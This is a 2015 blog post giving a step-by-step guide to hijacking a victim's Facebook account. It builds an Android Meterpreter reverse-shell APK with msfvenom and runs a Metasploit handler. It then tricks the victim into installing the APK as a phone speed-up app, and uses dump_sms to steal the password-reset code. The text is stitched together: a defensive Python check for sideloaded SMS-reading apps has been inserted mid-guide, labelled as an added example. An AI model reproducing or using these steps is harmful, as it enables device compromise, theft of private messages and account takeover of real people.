
Tuesday, 22 September 2015

Hacking a Facebook account via Android exploitation



Greetings, people,

BL4CK|Phoenix hacking squad brought you a simple way of hacking a Facebook account using a Meterpreter reverse shell through msfconsole. This does not exploit Facebook itself; it exploits the victim's Android phone in order to hack his Facebook account.

Let's start with the following steps:


--> Fire up Kali linux

--> Open terminal and start metasploit and postresql services

command --> # service metasploit start $$ service postgresql start




--> open port 4444 or any other to host your public ip from your router (note your linux firewall is not blocking the port)

--> check your port is open or not

to check type command in terminal

command --> # nc -lvp 4444(port number) note port 4444 is an  
example

if port is listening then

go to http://www.yougetsignal.com/tools/open-ports/


type port number and hit check button if it is open you will get




sessions in terminal .


--> Now make meterpreter reverse shell(payload)for android device

type following command in terminal

command --> # msfvenom -p android/meterpreter/reverse_tcp
                          Lhost=(your external ip ) LPORT=(port no) R> name.apk





--> now open msfconsole by typing command --> # msfconsole 



it will take bit of time to open


once it open's follow the command


msf > use multi/handler hit enter



msf exploit(handler) > set payload android/meterpreter/reverse_tcp



this will set payload

msf exploit(handler) > set lhost (your internal ip)
this will set lhost

msf exploit(handler) > set lport (port no)

this will set lport 



msf exploit(handler) > exploit this will start 
the msf handler 







--> now tricky part comes upload the name.apk to any file sharing

site for example http://zippyshare.com/ or any other and shrink

the url with http://tinyurl.com/ or any other .

--> now send this link to victim on facebook to download payload

say him any thing it will speed up your phone etc.

--> once the victim install's the name.apk(payload) the handler will

start sessions 



--> now quickly go to facebook login and click forget password and

type victim's username and click search, once you got victim's

profile choose his phone number to reset password .

--> once you are done with it wait for 5-6 secs

--> now go to terminal and type command

--> command > dump_sms
--> once your fetched the sms 

 

--> open sms log txt file and get the victim facebook reset code and 



reset the victim facebook account password .
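
Seen from the defender's side, the chain above depends on two things that can be checked on a device: an APK installed from outside a trusted store, and that app holding permission to read SMS, which is where the reset code is taken from. The following is an added example, not part of the original post: a triage check over a device app inventory that flags such packages. The `AppRecord` format, the sample package names and the `TRUSTED_INSTALLERS` set are assumptions constructed for illustration.

```python
"""Flag Android packages from untrusted sources that can read SMS (added defensive example)."""
from dataclasses import dataclass
from typing import FrozenSet, Optional

# Android permissions that let an app read SMS content, including account-reset codes.
SMS_READ_PERMISSIONS = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
}

# Assumption: installer package names this organisation trusts.
TRUSTED_INSTALLERS = {"com.android.vending"}  # Google Play Store


@dataclass(frozen=True)
class AppRecord:
    """One row of a hypothetical inventory export (e.g. from an MDM agent)."""
    package: str
    installer: Optional[str]  # None when the device reports no installer of record
    permissions: FrozenSet[str]


def risky_sms_apps(inventory):
    """Return (package, sorted SMS permissions) for untrusted-source apps that can read SMS."""
    findings = []
    for app in inventory:
        sms_perms = sorted(SMS_READ_PERMISSIONS & app.permissions)
        untrusted_source = app.installer not in TRUSTED_INSTALLERS
        if sms_perms and untrusted_source:
            findings.append((app.package, sms_perms))
    return findings


# Constructed sample inventory (hypothetical package names, not real apps).
SAMPLE_INVENTORY = [
    AppRecord("com.example.messenger", "com.android.vending",
              frozenset({"android.permission.READ_SMS", "android.permission.INTERNET"})),
    AppRecord("com.example.speedbooster", None,
              frozenset({"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
                         "android.permission.INTERNET"})),
    AppRecord("com.example.wallpaper", None,
              frozenset({"android.permission.INTERNET"})),
]

if __name__ == "__main__":
    for package, perms in risky_sms_apps(SAMPLE_INVENTORY):
        print(f"REVIEW {package}: untrusted install source and holds {', '.join(perms)}")
```

An account that uses an authenticator app or hardware key for recovery and login, instead of SMS codes, is not exposed to the reset step at all, whatever is installed on the phone.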


You have to be very fast before victim could understand what is happening

The more faster you are , the more successful you are


|EXPECT THE PHOENIX|

                               -Bit'z Ap'urv




2 comments:

  1. How to open port? I'm getting port is closed for my IP address, please help me with that.

    1. You have to open port from your router and note that your firewall is not blocking that port
